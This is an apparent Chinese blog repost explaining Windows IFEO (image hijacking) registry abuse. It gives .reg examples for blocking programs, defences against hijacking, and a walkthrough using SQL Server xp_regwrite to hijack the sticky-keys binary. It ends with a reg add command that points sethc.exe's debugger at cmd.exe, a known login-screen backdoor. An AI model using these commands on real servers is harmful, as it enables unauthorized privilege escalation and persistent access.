映像劫持
一、原理
所谓的映像劫持(IFEO)就是ImageFileExecutionOptions,它位于注册表的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion \ImageFileExecutionOptions\键值下。由于这个项主要是用来调试程序用的,对一般用户意义不大,默认是只有管理员和 localsystem有权读写修改。
比如我想运行QQ.exe,结果运行的却是FlashGet.exe,这种情况下,QQ程序被FLASHGET给劫持了,即你想运行的程序被另外一个程序代替了。
二、被劫持
虽然映像劫持是系统自带的功能,对一般用户来说根本没什么用的必要,但是就有一些病毒通过映像劫持来做文章,表面上看起来是运行了一个正常的程序,实际上病毒已经在后台运行了。
大部分的病毒和木马都是通过加载系统启动项来运行的,也有一些是注册成为系统服务来启动,他们主要通过修改注册表来实现这个目的,主要有以下几个键值:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsCurrent\Version\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsCurrent\Version\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrent\Version\RunServicesOnce
但是与一般的木马,病毒不同的是,就有一些病毒偏偏不通过这些来加载自己,不随着系统的启动运行。木马病毒的作者抓住了一些用户的心理,等到用户运行某 个特定的程序的时候它才运行。因为一般的用户,只要发觉自己的机子中了病毒,首先要察看的就是系统的加载项,很少有人会想到映像劫持,这也是这种病毒高明 的地方。
映像劫持病毒主要通过修改注册表中的HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \WindowsNT\CurrentVersion\ImageFileExecutionOptions\项来劫持正常的程序,比如有一个病毒 vires.exe要劫持qq程序,它会在上面注册表的位置新建一个qq.exe项,再在这个项下面新建一个字符串的键debugger把其值改为 C:\WINDOWS\SYSTEM32\VIRES.EXE(这里是病毒藏身的目录)即可。
三、玩劫持
1、禁止某些程序的运行
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\qq.exe]
Debugger=123.exe
把上面的代码保存为norun_qq.reg,双击导入注册表,每次双击运行QQ的时候,系统都会弹出一个框提示说找不到QQ,原因就QQ被重定向了。如果要让QQ继续运行的话,把123.exe改为其安装目录就可以了。
2、偷梁换柱恶作剧
每次我们按下CTRL+ALT+DEL键时,都会弹出任务管理器,想不想在我们按下这些键的时候让它弹出命令提示符窗口,下面就教你怎么玩:
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\taskmgr.exe]
Debugger=D:\WINDOWS\pchealth\helpctr\binaries\mconfig.exe
将上面的代码另存为task_cmd.reg,双击导入注册表。按下那三个键打开了“系统配置实用程序”。
3、让病毒迷失自我
同上面的道理一样,如果我们把病毒程序给重定向了,是不是病毒就不能运行了,答案是肯定的。
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sppoolsv.exe]
Debugger=123.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\logo_1.exe]
Debugger=123.exe
上面的代码是以金猪病毒和威金病毒为例,这样即使这些病毒在系统启动项里面,即使随系统运行了,但是由于映象劫持的重定向作用,还是会被系统提示无法找到病毒文件(这里是logo_1.exe和sppoolsv.exe)。
四、防劫持
1、权限限制法
打开注册表编辑器,定位到
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion \ImageFileExecutionOptions\,选中该项,右键→权限→高级,取消administrator和system用户的写权限即 可。
2、快刀斩乱麻法
打开注册表编辑器,定位到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\,把“ImageFileExecutionOptions”项删除即可。
总结:以上关于映像劫持的解析与利用但愿对于大家查杀木马病毒有所帮助,也希望大家能够挖掘更多更实用的功能。
xp_regwrite映像劫持快速提权
sql命令读取服务器终端端口:exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp’,’PortNumber’
终端端口为3389,连接测试终端端口,并测试shift粘滞键功能
连接正常,粘滞键测试正常弹出,再去收集下其他信息
先发布三条命令
1.sql命令查询注册表粘滞键是否被劫持
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe’,’Debugger’
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite ‘HKEY_LOCAL_MACHINE’, ‘SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe’, ‘Debugger’,’REG_SZ’,’C:\WINDOWS\system32\taskmgr.exe’
3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用
xp_regdeletekey ‘HKEY_LOCAL_MACHINE’, ‘SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe’
好了,我们替换后查询一下看看是否正确写入注册表了
查询结果显示正常写入,下面就连接终端,五次shift,弹出可爱的任务管理器了
转自:
1、http://hi.baidu.com/philame/item/491b538cf8670659840fabc6
2、http://hi.baidu.com/lbfinxvcojhxyze/item/6f9fc271554067377044232d
ps:命令行下执行命令:reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v debugger /t reg_sz /d c:\windows\system32\cmd.exe /f 就可以进行镜像劫持。
转载请注明:jinglingshu的博客 » 映像劫持 与 提权